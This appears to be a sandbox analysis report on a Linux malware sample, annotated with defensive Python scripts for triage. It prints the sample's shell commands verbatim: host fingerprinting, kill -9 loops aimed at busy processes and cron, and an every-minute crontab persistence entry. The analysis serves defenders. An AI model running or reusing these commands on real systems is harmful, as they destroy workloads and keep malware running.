Analysis

max time kernel: 149s
max time network: 144s
platform: ubuntu-24.04_amd64
resource: ubuntu2404-amd64-20240523-en
resource tags: arch:amd64, arch:i386, image:ubuntu2404-amd64-20240523-en, kernel:6.8.0-31-generic, locale:en-us, os:ubuntu-24.04-amd64, system
submitted: 18-12-2024 05:23

Behavioral task: behavioral1
Sample: .x86_64
Resource: ubuntu2404-amd64-20240523-en

General

Target: .x86_64
Size: 6.1MB
MD5: f9ba8c3372fdaf67422703bbc2208640
SHA1: 5042e58bc2e1d94912d11b11286ad6bccf0e4666
SHA256: 8602c57b152d735fb6e44c5866cd4a837f337d5464641f55e22fd65556e41ee2
SHA512: d330557ff2bab35181a5b2ce550b11fc4f3dc8d38431ac26989d22b9247df955684fddf97dc11235001852b490704db3af87ed859c8a5bca3573aac66dd1018c
SSDEEP: 98304:HtpIDtRKq6YrRYjfmUyy++++++qq++++u+uwP5R5R5VYjMYjMtpuVE8OLqjbOqw0:H+tAq65cKEpHVGZA2O7TI
Malware Config
Signatures

Checks hardware identifiers (DMI)  [1 TTP, 4 IoCs]
Checks DMI information which indicates whether the system is a virtual machine.
  description               ioc                                            process
  File opened for reading   /sys/devices/virtual/dmi/id/product_name       .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/board_vendor       .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/bios_vendor        .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/sys_vendor         .x86_64
Creates/modifies Cron job  [1 TTP, 1 IoC]
Cron allows running tasks on a schedule and is commonly used for malware persistence.
  description                    ioc                                    process
  File opened for modification   /var/spool/cron/crontabs/tmp.tFhxv3    crontab
  (tmp.tFhxv3 is the temporary file crontab(1) writes into the spool before renaming it over the user's crontab; the entry being installed comes from the sh -c at PID 2538 under Processes, which runs `crontab /tmp/.cron`.)
Enumerates running processes
Discovers information about currently running processes on the system.
Reads hardware information  [1 TTP, 14 IoCs]
Accesses system info like serial numbers, manufacturer names etc.
  description               ioc                                              process
  File opened for reading   /sys/devices/virtual/dmi/id/chassis_vendor       .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/chassis_serial       .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/bios_date            .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/chassis_asset_tag    .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/product_version      .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/board_version        .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/board_asset_tag      .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/chassis_type         .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/product_serial       .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/product_uuid         .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/board_name           .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/chassis_version      .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/board_serial         .x86_64
  File opened for reading   /sys/devices/virtual/dmi/id/bios_version         .x86_64
Security Software Discovery  [1 TTP, 2 IoCs]
Adversaries may attempt to discover installed security software and its configurations.
  pid    process
  2553   sh
  2530   sh
  (Both flagged shells are the CPU-usage kill loops shown under Processes: `ps aux | grep -v grep | ... | awk '{if($3>30.0) print $2}' | while read procid; do kill -9 $procid; done`. The generic tag fires on the process enumeration; what the loops actually do is kill -9 any process, other than grep, an idle `-bash` and /usr/sbin/httpd, that is using more than 30% CPU, which would hit a monitoring agent and any legitimate busy workload alike. Treat it as process enumeration plus indiscriminate process termination rather than a confirmed check for a specific security product.)
Checks CPU configuration  [1 TTP, 5 IoCs]
Checks CPU information which indicates whether the system is a virtual machine.
  description               ioc              process
  File opened for reading   /proc/cpuinfo    ps
  File opened for reading   /proc/cpuinfo    ps
  File opened for reading   /proc/cpuinfo    .x86_64
  File opened for reading   /proc/cpuinfo    grep
  File opened for reading   /proc/cpuinfo    grep
Reads CPU attributes  [1 TTP, 7 IoCs]
  description               ioc                                  process
  File opened for reading   /sys/devices/system/cpu/online       .x86_64
  File opened for reading   /sys/devices/system/cpu/types        .x86_64
  File opened for reading   /sys/devices/system/cpu/possible     .x86_64
  File opened for reading   /sys/devices/system/cpu/possible     ps
  File opened for reading   /sys/devices/system/cpu/possible     ps
  File opened for reading   /sys/devices/system/cpu/possible     ps
  File opened for reading   /sys/devices/system/cpu/possible     ps
Enumerates kernel/hardware configuration  [1 TTP, 64 IoCs]
Reads contents of /sys virtual filesystem to enumerate system information.
All 64 IoCs are "File opened for reading". Grouped by subsystem (60 by process .x86_64, 4 by process ps):

  process .x86_64
    cgroup:      /sys/fs/cgroup/cgroup.controllers, /sys/fs/cgroup/cpuset.cpus.effective, /sys/fs/cgroup/cpuset.mems.effective
    cpufreq:     /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency, /sys/bus/cpu/devices/cpu0/cpufreq/cpuinfo_max_freq
    topology:    /sys/bus/cpu/devices, /sys/bus/cpu/devices/cpu0/topology/package_cpus, /sys/bus/cpu/devices/cpu0/topology/physical_package_id, /sys/bus/cpu/devices/cpu0/topology/die_cpus, /sys/bus/cpu/devices/cpu0/topology/core_cpus, /sys/bus/cpu/devices/cpu0/topology/core_id
    cache index0: /sys/bus/cpu/devices/cpu0/cache/index0/{number_of_sets, size, physical_line_partition, type, coherency_line_size, shared_cpu_map, level}
    cache index1: /sys/bus/cpu/devices/cpu0/cache/index1/{shared_cpu_map, level, type}
    cache index2: /sys/bus/cpu/devices/cpu0/cache/index2/{number_of_sets, physical_line_partition, type, size, coherency_line_size, shared_cpu_map, level}
    cache index3: /sys/bus/cpu/devices/cpu0/cache/index3/{level, type, physical_line_partition, shared_cpu_map, number_of_sets, coherency_line_size, size}
    cache index4..9: /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map, index5/shared_cpu_map, index6/shared_cpu_map, index7/shared_cpu_map, index8/shared_cpu_map, index9/shared_cpu_map
    NUMA:        /sys/devices/system/node/online, /sys/bus/node/devices/node0/cpumap, /sys/bus/node/devices/node0/meminfo, /sys/bus/node/devices/node0/access0/initiators, /sys/bus/node/devices/node0/access0/initiators/read_latency, /sys/bus/node/devices/node0/access0/initiators/read_bandwidth
    hugepages:   /sys/kernel/mm/hugepages, /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages, /sys/kernel/mm/hugepages/hugepages-1048576kB/nr_hugepages, /sys/bus/node/devices/node0/hugepages, /sys/bus/node/devices/node0/hugepages/hugepages-1048576kB/nr_hugepages, /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages, /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages
    dax:         /sys/bus/dax/devices, /sys/bus/dax/devices/target_node, /sys/bus/dax/target_node
    DMI:         /sys/devices/virtual/dmi/id, /sys/firmware/dmi/tables/DMI, /sys/firmware/dmi/tables/smbios_entry_point

  process ps
    /sys/devices/system/node (4 reads)

The .x86_64 set (cache levels and shared_cpu_map per index, NUMA node cpumap and access latency/bandwidth, 2 MiB and 1 GiB hugepage counts, cgroup cpuset limits) is the set of files a CPU-topology discovery library such as hwloc reads at start-up, so the binary is sizing a CPU-bound workload to the host. The report does not show what that workload is.
Process Discovery  [1 TTP, 2 IoCs]
Adversaries may try to discover information about running processes.
  pid    process
  2532   ps
  2556   ps

Reads runtime system information  [64 IoCs]
(The heading for this table is missing from the extracted page; the ps processes under Processes carry the tag "Reads runtime system information", which is the signature these IoCs most plausibly belong to.)
All 64 IoCs are "File opened for reading":
  process grep: /proc/self/maps
  process ps (63 reads of /proc/<pid>/{stat,status,cmdline,ctty,environ}):
    /proc/15/stat, /proc/141/status, /proc/2130/ctty, /proc/51/status, /proc/65/ctty, /proc/1946/ctty, /proc/2028/stat, /proc/199/cmdline, /proc/14/cmdline, /proc/1946/status, /proc/1936/ctty, /proc/123/status, /proc/1990/status, /proc/42/status, /proc/199/stat, /proc/200/ctty, /proc/1690/status, /proc/1923/stat, /proc/1/status, /proc/51/ctty, /proc/1780/status, /proc/3/ctty, /proc/10/cmdline, /proc/188/stat, /proc/2187/environ, /proc/2/status, /proc/387/status, /proc/2132/ctty, /proc/21/status, /proc/1943/status, /proc/6/cmdline, /proc/386/environ, /proc/193/cmdline, /proc/1040/environ, /proc/1923/cmdline, /proc/2120/status, /proc/1680/stat, /proc/197/status, /proc/201/status, /proc/2521/ctty, /proc/47/ctty, /proc/2555/stat, /proc/190/ctty, /proc/2526/ctty, /proc/1807/status, /proc/21/stat, /proc/28/cmdline, /proc/2084/ctty, /proc/2290/status, /proc/2560/stat, /proc/2/ctty, /proc/2171/ctty, /proc/16/status, /proc/2257/status, /proc/31/stat, /proc/40/stat, /proc/2477/stat, /proc/1934/stat, /proc/1908/cmdline, /proc/12/cmdline, /proc/758/ctty, /proc/197/environ, /proc/458/status
Writes file to tmp directory  [2 IoCs]
Malware often drops required files in the /tmp directory.
  description                    ioc           process
  File opened for modification   /tmp/.cron    sh
  File opened for modification   /tmp/.lock    .x86_64
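A crontab triage check, added here as an example; it is not part of the sandbox report or of the sample. It parses the five-field user-crontab format that `crontab -l` prints (the files under /var/spool/cron/crontabs/ use the same format) and flags entries that run every minute, run from a world-writable directory, or execute a hidden dotfile: the three properties of the entry this sample installs, a `* * * * * <cwd>//tmp/.x86_64` line built by the sh -c at PID 2538 under Processes. The crontab text in the block is constructed.

```python
"""Triage check for the cron persistence this sample installs.

Added example, not code from the sandbox report or from the sample. It parses
the five-field user-crontab format that `crontab -l` prints (the files under
/var/spool/cron/crontabs/ use the same format) and flags entries that run every
minute, run from a world-writable directory, or execute a hidden dotfile. The
crontab text below is constructed; its last line is the entry the sample's
sh -c (PID 2538) builds when the working directory is /tmp.
"""
import posixpath
import re

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")   # MAILTO=..., PATH=...


def parse_crontab(text):
    """Yield (schedule, command) for each entry; skip comments and assignments."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ASSIGNMENT.match(line):
            continue
        if line.startswith("@"):                  # @reboot, @daily, ...
            schedule, _, command = line.partition(" ")
        else:
            parts = line.split(None, 5)           # five time fields + command
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        yield schedule, command.strip()


def suspicious_reasons(schedule, command):
    """Return the list of reasons an entry looks like dropper persistence."""
    words = command.split()
    if not words:
        return []
    # normpath collapses the doubled slash in "/tmp//tmp/.x86_64"
    exe = posixpath.normpath(words[0])
    reasons = []
    if schedule == "* * * * *":
        reasons.append("runs every minute")
    if any(exe.startswith(d) for d in WORLD_WRITABLE):
        reasons.append("executable under world-writable dir: " + exe)
    if posixpath.basename(exe).startswith("."):
        reasons.append("hidden dotfile executable: " + exe)
    return reasons


def scan_crontab(text):
    """Return [(schedule, command, reasons)] for the flagged entries only."""
    flagged = []
    for schedule, command in parse_crontab(text):
        reasons = suspicious_reasons(schedule, command)
        if reasons:
            flagged.append((schedule, command, reasons))
    return flagged


# Constructed crontab: two benign entries plus the line this sample installs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
@daily /usr/local/bin/backup.sh
* * * * * /tmp//tmp/.x86_64
"""

if __name__ == "__main__":
    for schedule, command, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"{schedule}  {command}")
        for r in reasons:
            print("    " + r)
```

On a live host, feed it the output of `crontab -l -u <user>` for every user or the files in /var/spool/cron/crontabs/. It only inspects the first word of the command, so an entry such as `cd /tmp && ./.x` is missed, and the seven-field /etc/cron.d and /etc/crontab format (with a user column) needs the user field stripped first.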
Processes

Every sh -c below is a direct child of the sample (PID 2479); the commands under each one are the children it spawned, listed in report order with the signatures the sandbox attached to them. The root-only branches executed in this run (`ps x | grep /etc/cron` under PID 2521 and `ps aux` rather than `ps -u $(whoami) ux` under PIDs 2530 and 2553), so the sample ran as uid 0.

/tmp/.x86_64  (PID 2479)
    cmdline: /tmp/.x86_64
    signatures: Checks hardware identifiers (DMI); Reads hardware information; Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Writes file to tmp directory

    /bin/sh  (PID 2481)
        cmdline: sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
        purpose: prints a host fingerprint of the form [<first address from hostname -I>-<second word of the first sshd_config line containing 'Port '>][whoami][hostname][number of 'processor' lines in /proc/cpuinfo][CPU model name reduced to QEMU, Haswell, Broadwell, the Intel model number, or the three words after AMD]. Note that `grep 'Port '` also matches the commented-out default `#Port 22`. The report records no network activity, so it does not show where this string goes.
        /usr/bin/hostname  (PID 2484)   hostname -I
        /usr/bin/awk       (PID 2486)   awk "{print \$1}"
        /usr/bin/cat       (PID 2488)   cat /etc/ssh/sshd_config
        /usr/bin/grep      (PID 2489)   grep "Port "
        /usr/bin/head      (PID 2490)   head -n 1
        /usr/bin/awk       (PID 2491)   awk "{print \"-\"\$2}"
        /usr/bin/whoami    (PID 2492)   whoami
        /usr/bin/hostname  (PID 2493)   hostname
        /usr/bin/grep      (PID 2494)   grep -c "^processor" /proc/cpuinfo   [Checks CPU configuration]
        /usr/bin/grep      (PID 2497)   grep -m 1 "model name" /proc/cpuinfo   [Checks CPU configuration]
        /usr/bin/cut       (PID 2498)   cut -d: -f2
        /usr/bin/sed       (PID 2499)   sed -e "s/^ *//"
        /usr/bin/sed       (PID 2500)   sed -e "s/\$//"
        /usr/bin/awk       (PID 2503)   awk "{print \$1}"
        /usr/bin/awk       (PID 2506)   awk "{print \$4}"
        /usr/bin/awk       (PID 2509)   awk "{print \$4}"
        /usr/bin/awk       (PID 2512)   awk "{print \$3}"
        /usr/bin/awk       (PID 2515)   awk "{print \$4}"
        /usr/bin/awk       (PID 2518)   awk "{print \$1}"
        /usr/bin/awk       (PID 2520)   awk "{print \$2\" \"\$3\" \"\$4}"

    /bin/sh  (PID 2521)
        cmdline: sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
        purpose: kill -9 the parent of every zombie process (one kill per distinct PPID), then, as root, kill -9 anything whose `ps x` line mentions /etc/cron. In the second loop `read procid` receives the whole `ps x` line, not just the PID.
        /usr/bin/ps        (PID 2522)   ps -A "-ostat,ppid"   [Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information]
        /usr/bin/awk       (PID 2523)   awk "/[zZ]/ && !a[\$2]++ {print \$2}"
        /usr/bin/id        (PID 2525)   id -u
        /usr/bin/ps        (PID 2526)   ps x   [Reads CPU attributes; Enumerates kernel/hardware configuration; Reads runtime system information]
        /usr/bin/grep      (PID 2527)   grep /etc/cron
        /usr/bin/grep      (PID 2528)   grep -v grep

    /bin/sh  (PID 2530)   [Security Software Discovery]
        cmdline: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
        purpose: kill -9 every process (all users as root, own processes otherwise) using more than 30% CPU in the ps %CPU column, sparing only lines containing "grep", lines ending in "-bash" and lines containing /usr/sbin/httpd.
        /usr/bin/id        (PID 2531)   id -u
        /usr/bin/ps        (PID 2532)   ps aux   [Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Process Discovery; Reads runtime system information]
        /usr/bin/grep      (PID 2533)   grep -v grep
        /usr/bin/grep      (PID 2534)   grep -v -- "-bash[[:space:]]*\$"
        /usr/bin/grep      (PID 2535)   grep -v /usr/sbin/httpd
        /usr/bin/awk       (PID 2536)   awk "{if(\$3>30.0) print \$2}"

    /bin/sh  (PID 2538)   [Writes file to tmp directory]
        cmdline: sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/.x86_64' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.x86_64\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
        purpose: cron persistence. Copies the existing crontab minus any line mentioning /tmp/.x86_64 into .cron, appends an every-minute entry `* * * * * $dir//tmp/.x86_64`, installs it with `crontab $dir/.cron` if the current crontab has no line ending in /tmp/.x86_64, then deletes .cron. The working directory here was /tmp (see the `rm -rf /tmp/.cron` children), so the installed line points at /tmp//tmp/.x86_64: the sample expects to be launched from a directory that contains a tmp/.x86_64 subpath. Keeping the victim's own entries means a casual `crontab -l` shows the usual jobs plus one extra line.
        /usr/bin/rm        (PID 2540)   rm -rf /tmp/.cron
        /usr/bin/crontab   (PID 2541)   crontab -l
        /usr/bin/grep      (PID 2542)   grep -v grep
        /usr/bin/grep      (PID 2543)   grep -v /tmp/.x86_64   [Reads runtime system information]
        /usr/bin/crontab   (PID 2545)   crontab -l
        /usr/bin/grep      (PID 2546)   grep -v grep
        /usr/bin/grep      (PID 2547)   grep "/tmp/.x86_64\$"
        /usr/bin/sort      (PID 2548)   sort
        /usr/bin/uniq      (PID 2549)   uniq
        /usr/bin/wc        (PID 2550)   wc -l
        /usr/bin/crontab   (PID 2551)   crontab /tmp/.cron   [Creates/modifies Cron job]
        /usr/bin/rm        (PID 2552)   rm -rf /tmp/.cron

    /bin/sh  (PID 2553)   [Security Software Discovery]
        cmdline: sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
        purpose: the complement of PID 2530: counts `-bash` processes above 30% CPU and, only if there is more than one, kill -9 all of them. In this run only the counting `ps aux` ran, so the count was at most 1.
        /usr/bin/id        (PID 2554)   id -u
        /usr/bin/ps        (PID 2556)   ps aux   [Checks CPU configuration; Reads CPU attributes; Enumerates kernel/hardware configuration; Process Discovery; Reads runtime system information]
        /usr/bin/grep      (PID 2557)   grep -v grep
        /usr/bin/grep      (PID 2558)   grep -- "-bash[[:space:]]*\$"
        /usr/bin/awk       (PID 2559)   awk "{if(\$3>30.0) print \$2}"
        /usr/bin/wc        (PID 2560)   wc -l
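What the first sh -c child (PID 2481) computes, rebuilt as an added Python example over constructed inputs; this is not code from the report or from the sample. Each function mirrors one grep/cut/sed/awk stage of that command, branch for branch, so the `[ip-port][user][host][ncpu][cpu]` string a defender should expect is readable without re-running the pipeline. The IP, user and hostname arguments, the sshd_config text and the /proc/cpuinfo text are all constructed; the report's Network section recorded nothing, so this page does not say where the string is sent.

```python
"""Rebuild the host fingerprint that the first sh -c child (PID 2481) echoes:

    [<ip>-<sshport>][<user>][<host>][<ncpu>][<cpu label>]

Added example, not code from the report or from the sample. Each function
mirrors one grep/cut/sed/awk stage of that command so the output format is
readable without re-running the pipeline. All inputs below are constructed:
the IP, user and hostname arguments, the sshd_config text and the
/proc/cpuinfo text. The report's Network section recorded no traffic, so this
page does not say where the string is sent.
"""


def ssh_port_suffix(sshd_config):
    """grep 'Port ' | head -n 1 | awk '{print "-"$2}'.
    Like the original, the first line containing 'Port ' wins, so a commented
    '#Port 22' above a real 'Port 2222' yields '-22'."""
    for line in sshd_config.splitlines():
        if "Port " in line:
            fields = line.split()
            return "-" + (fields[1] if len(fields) > 1 else "")
    return ""


def cpu_count(cpuinfo):
    """grep -c ^processor /proc/cpuinfo"""
    return sum(1 for line in cpuinfo.splitlines() if line.startswith("processor"))


def cpu_label(cpuinfo):
    """The if/elif chain that normalises the first 'model name' line."""
    first = next((l for l in cpuinfo.splitlines() if "model name" in l), "")
    x = first.split(":", 1)[1].lstrip() if ":" in first else ""   # cut -d: -f2 | sed 's/^ *//'
    f = x.split()                                                # awk fields of `echo $X`

    def fld(n):                      # awk $n; "" when the field does not exist
        return f[n - 1] if len(f) >= n else ""

    if fld(1) == "QEMU":
        return "QEMU"
    if fld(4) == "(Haswell)":
        return "Haswell"
    if fld(4) == "(Broadwell)":
        return "Broadwell"
    if fld(3) == "CPU":              # "Intel(R) Xeon(R) CPU E5-2680 v4 ..."   -> E5-2680
        return fld(4)
    if fld(4) == "CPU":              # "Intel(R) Core(TM) i7-8700 CPU @ ..."   -> i7-8700
        return fld(3)
    if fld(1) == "AMD":              # "AMD EPYC 7502P 32-Core Processor"      -> EPYC 7502P 32-Core
        return " ".join((fld(2), fld(3), fld(4)))
    return " ".join(f)               # else: echo $X (whitespace collapsed)


def fingerprint(ip, sshd_config, user, host, cpuinfo):
    """Assemble the bracketed string exactly as the echo in PID 2481 does."""
    return "[{}{}][{}][{}][{}][{}]".format(
        ip, ssh_port_suffix(sshd_config), user, host,
        cpu_count(cpuinfo), cpu_label(cpuinfo))


# Constructed inputs: a two-core Xeon guest whose sshd_config still carries the
# stock commented '#Port 22' above the real 'Port 2222'.
CPUINFO = (
    "processor\t: 0\nmodel name\t: Intel(R) Xeon(R) CPU E5-2680 v4 @ 2.40GHz\n"
    "processor\t: 1\nmodel name\t: Intel(R) Xeon(R) CPU E5-2680 v4 @ 2.40GHz\n"
)
SSHD_CONFIG = "#Port 22\nPort 2222\nListenAddress 0.0.0.0\n"

if __name__ == "__main__":
    print(fingerprint("10.0.0.5", SSHD_CONFIG, "root", "web01", CPUINFO))
```

The constructed run prints `[10.0.0.5-22][root][web01][2][E5-2680]`: the port is the commented default, not the port sshd actually listens on, because `grep 'Port '` does not skip comment lines. In the original, a missing awk field turns the `[ ... = 'QEMU' ]` test into a syntax error that is swallowed by `2>/dev/null` and treated as false; `fld()` returning "" reproduces that fall-through.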
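A dry run of the three process-killing loops (PIDs 2521, 2530 and 2553 above) against a constructed process table, added as an example that is not code from the report or from the sample. It transcribes each pipeline's selection rule into a function and returns the PIDs the `kill -9` would receive, so the collateral damage of the 30% CPU rule and of the "kill the parent of every zombie" rule is visible; nothing is actually killed. The process table and its PIDs are constructed.

```python
"""Dry run of the three process-killing loops in the sh -c children
(PIDs 2521, 2530 and 2553 in the process tree) against a constructed listing.

Added example, not code from the report or from the sample; nothing is
killed. The rules are transcribed from the command lines in the tree:
  rule 1  ps -A -ostat,ppid | awk '/[zZ]/ && !a[$2]++ {print $2}'
          -> kill -9 the PARENT of every zombie (deduplicated)
  rule 2  ps aux | grep -v grep | grep -v -- '-bash[[:space:]]*$'
                 | grep -v /usr/sbin/httpd | awk '{if($3>30.0) print $2}'
          -> kill -9 anything else above 30% CPU
  rule 3  ps aux | grep -v grep | grep -- '-bash[[:space:]]*$'
                 | awk '{if($3>30.0) print $2}' | wc -l   (-gt 1)
          -> kill -9 busy '-bash' sessions, but only if more than one
"""
import re

# Constructed process table: (user, pid, ppid, %cpu, stat, command)
PROCS = [
    ("root",       1,    0,  0.0, "Ss", "/sbin/init"),
    ("root",     758,    1,  0.1, "Ss", "/usr/sbin/cron -f"),
    ("postgres", 901,    1, 45.2, "Rl", "postgres: checkpointer"),
    ("www",     1040,    1, 52.0, "S",  "/usr/sbin/httpd -k start"),
    ("root",    1200,  758,  0.0, "Zs", "[run-parts] <defunct>"),
    ("alice",   1300, 1290, 35.5, "Ss", "-bash"),
    ("bob",     1301, 1291, 40.0, "Ss", "-bash"),
    ("root",    2533, 2530,  0.0, "R",  "grep -v grep"),
]


def ps_aux_line(p):
    """Render a row the way `ps aux` prints it: $2 is PID, $3 is %CPU."""
    user, pid, ppid, cpu, stat, cmd = p
    return f"{user} {pid} {cpu:.1f} 0.0 0 0 ? {stat} 10:00 0:00 {cmd}"


def zombie_parents(procs):
    """Rule 1: PPIDs of rows whose STAT contains z/Z, first occurrence only."""
    seen, victims = set(), []
    for _, _, ppid, _, stat, _ in procs:
        if re.search(r"[zZ]", stat) and ppid not in seen:
            seen.add(ppid)
            victims.append(ppid)
    return victims


def cpu_hogs(procs, threshold=30.0):
    """Rule 2: PIDs left after the three grep -v filters with %CPU > threshold."""
    victims = []
    for p in procs:
        line = ps_aux_line(p)
        if "grep" in line or re.search(r"-bash\s*$", line) or "/usr/sbin/httpd" in line:
            continue
        if p[3] > threshold:
            victims.append(p[1])
    return victims


def busy_shells(procs, threshold=30.0):
    """Rule 3: busy '-bash' PIDs, applied only when more than one qualifies."""
    hits = [p[1] for p in procs
            if "grep" not in ps_aux_line(p)
            and re.search(r"-bash\s*$", ps_aux_line(p))
            and p[3] > threshold]
    return hits if len(hits) > 1 else []


if __name__ == "__main__":
    print("rule 1 (zombie parents):", zombie_parents(PROCS))
    print("rule 2 (cpu hogs):      ", cpu_hogs(PROCS))
    print("rule 3 (busy shells):   ", busy_shells(PROCS))
```

On the constructed table rule 1 picks cron (PID 758) because it is the parent of a defunct child, rule 2 picks the database process at 45% CPU while sparing httpd by name, and rule 3 picks both interactive shells. For a responder, unexplained SIGKILLs of cron or of busy services on a host that also has the every-minute crontab entry are part of this sample's footprint.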
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
Filesize: 28B
MD5: d702aeedac4e738ce12d0f9ed2db14c9
SHA1: 5dc9df7b01b0aa29cc2bf0c20b8027f5d43b8d98
SHA256: 56a3958992fb2ebfbdec3a7e5f2057131efc218cfaa8351b3852d13852255a68
SHA512: e25b83724d545c3412d6938a55f8cf863d1ddb4c4f6c7a5999929cc9afb3b32aff0b941d85a115cfef7b17e79eac72ec176944ce29119baf8e5367e95a3e71d3

File 2
Filesize: 212B
MD5: 9b2df22bae8962eca62ebdf980b476c4
SHA1: 9b1115d73e7d0044fe9a85035e8bde59b5016694
SHA256: 364584b976789a4000cecf963c1d93219be092581566b2ce80a9d4a7227a9bcd
SHA512: deb660ebaa23e655d2f24b0b8969e620cfe13ee46c922356f95d2dc21c450cb3986a3ddc47e0db2be629e99e6a68446c430fe017c266e4e2dad9721e5338eb60

The report does not name either file. The 28-byte one matches in size the single line `* * * * * /tmp//tmp/.x86_64` plus newline (28 bytes) that the sh -c at PID 2538 writes to /tmp/.cron when the existing crontab is empty, but the page does not confirm that mapping, and nothing on it identifies the 212-byte file.